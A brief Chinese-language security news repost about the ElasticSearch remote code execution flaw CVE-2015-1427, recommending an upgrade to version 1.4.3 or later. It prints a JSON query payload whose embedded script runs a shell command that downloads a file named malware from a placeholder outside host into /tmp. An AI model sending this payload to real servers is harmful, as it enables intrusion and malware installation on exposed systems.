转载

ElasticSearch 远程代码执行漏洞 CVE-2015-1427

5月23日 西安 OSC 源创会开始报名啦,存储、虚拟机、Docker 等干货分享

ElasticSearch 提供了一个扩展 JSON API ,提供搜索以及系统管理的功能。该 API 日前爆出编号为 CVE-2015-1427 的远程代码执行漏洞,该漏洞源于一篇博客的介绍,请看 here ( translated ).

可通过升级到 1.4.3 或者更新版本来修复这个漏洞。否则如果你的 ElasticSearch 暴露在互联网就可能通过如下代码来执行远程代码:

{"query":

{"filtered": {

"query": {"match_all": {}}}},

"script_fields": {"exp": {

"script": "import java.util.*;import java.io.*;String str = /"/";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(/"wget -O /tmp/malware http://x.x.x.x/malware /").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(/"/r/n/");}sb.toString();"

}}}

关于该漏洞的详细介绍和原理请看 此文 。

正文到此结束
Loading...